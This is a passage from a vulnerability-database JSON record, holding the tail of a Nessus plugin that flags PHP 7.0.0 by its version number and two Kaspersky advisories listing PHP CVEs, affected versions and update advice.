script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^7(\\.0)?$\")\n audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^7\\.0\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 7.0.0\", port);\n\n# Allow RCs/Beta/etc to be checked.\nif (version =~ \"^7\\.0\\.0([^0-9]|$)\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 7.0.1' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:43:51", "bulletinFamily": "info", "cvelist": ["CVE-2015-6527", "CVE-2015-8617", "CVE-2016-1904", "CVE-2016-1903", "CVE-2015-6836", "CVE-2015-6833", "CVE-2015-6831", "CVE-2015-5590", "CVE-2015-8616", "CVE-2015-6832"], "description": "### *Detect date*:\n01/19/2016\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in PHP. Malicious users can exploit these vulnerabilities to cause denial of service, affect arbitrary files, execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nPHP 7 versions earlier than 7.0.2 \nPHP 5.6 versions earlier than 5.6.17 \nPHP versions earlier than 5.5.31\n\n### *Solution*:\nUpdate to the latest version \n[Get PHP](<http://php.net/downloads.php>)\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[PHP](<https://threats.kaspersky.com/en/product/PHP/>)\n\n### *CVE-IDS*:\n[CVE-2016-1904](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1904>)7.5Critical \n[CVE-2016-1903](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1903>)6.4High \n[CVE-2015-8617](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8617>)10.0Critical \n[CVE-2015-8616](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8616>)7.5Critical \n[CVE-2015-6836](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6836>)7.5Critical \n[CVE-2015-6833](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6833>)5.0Critical \n[CVE-2015-6832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6832>)7.5Critical \n[CVE-2015-6831](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6831>)7.5Critical \n[CVE-2015-6527](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6527>)7.5Critical \n[CVE-2015-5590](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5590>)7.5Critical", "edition": 44, "modified": "2020-05-22T00:00:00", "published": "2016-01-19T00:00:00", "id": "KLA10746", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10746", "title": "\r KLA10746Multiple vulnerabilities in PHP ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:41:55", "bulletinFamily": "info", "cvelist": ["CVE-2015-6527", "CVE-2015-8617", "CVE-2016-1904", "CVE-2016-1903", "CVE-2015-6836", "CVE-2015-6833", "CVE-2015-6831", "CVE-2015-5590", "CVE-2015-8616", "CVE-2015-6832"], "description": "### *Detect date*:\n01/19/2016\n\n### *Severity*:\nCritical\n\n### *Description*:\nObsolete version of PHP was found in XAMPP & WAMP. Details about PHP vulnerabilities you can get at KLA10746.\n\n### *Affected products*:\nPHP 7 versions earlier than 7.0.2 \nPHP 5.6 versions earlier than 5.6.17 \nPHP versions earlier than 5.5.31\n\n### *Solution*:\nUpdate XAMPP or WAMP if vendor released corresponding patch or update PHP module individually. \n[WAMP downloads page](<http://www.wampserver.com/en/>) \n[XAMPP downloads page](<https://www.apachefriends.org/download.html>)\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[PHP](<https://threats.kaspersky.com/en/product/PHP/>)\n\n### *CVE-IDS*:\n[CVE-2016-1904](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1904>)7.5Critical \n[CVE-2016-1903](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1903>)6.4High \n[CVE-2015-8617](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8617>)10.0Critical \n[CVE-2015-8616](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8616>)7.5Critical \n[CVE-2015-6836](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6836>)7.5Critical \n[CVE-2015-6833](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6833>)5.0Critical \n[CVE-2015-6832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6832>)7.5Critical \n[CVE-2015-6831](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6831>)7.5Critical \n[CVE-2015-6527](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6527>)7.5Critical \n[CVE-2015-5590](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5590>)7.5Critical", "edition": 43, "modified": "2020-05-22T00:00:00", "published": "2016-01-19T00:00:00", "id": "KLA10747", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10747", "title": "\r KLA10747Obsolete PHP version in XAMPP & WAMP ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
